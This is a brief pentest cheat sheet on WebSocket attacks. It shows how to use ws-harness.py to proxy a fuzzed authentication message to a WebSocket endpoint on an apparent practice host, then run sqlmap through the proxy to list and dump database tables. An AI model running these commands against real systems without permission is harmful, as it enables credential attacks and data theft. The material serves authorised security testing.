# Web Sockets Attacks > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server Tools: - [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py) ## Summary * [Using ws-harness.py](#using-ws-harness-py) ## Using ws-harness.py Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint. ```powershell python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt ``` The content of the message should contains the **[FUZZ]** keyword. ```json {"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"} ``` Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket. ```python sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump ``` ## References - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)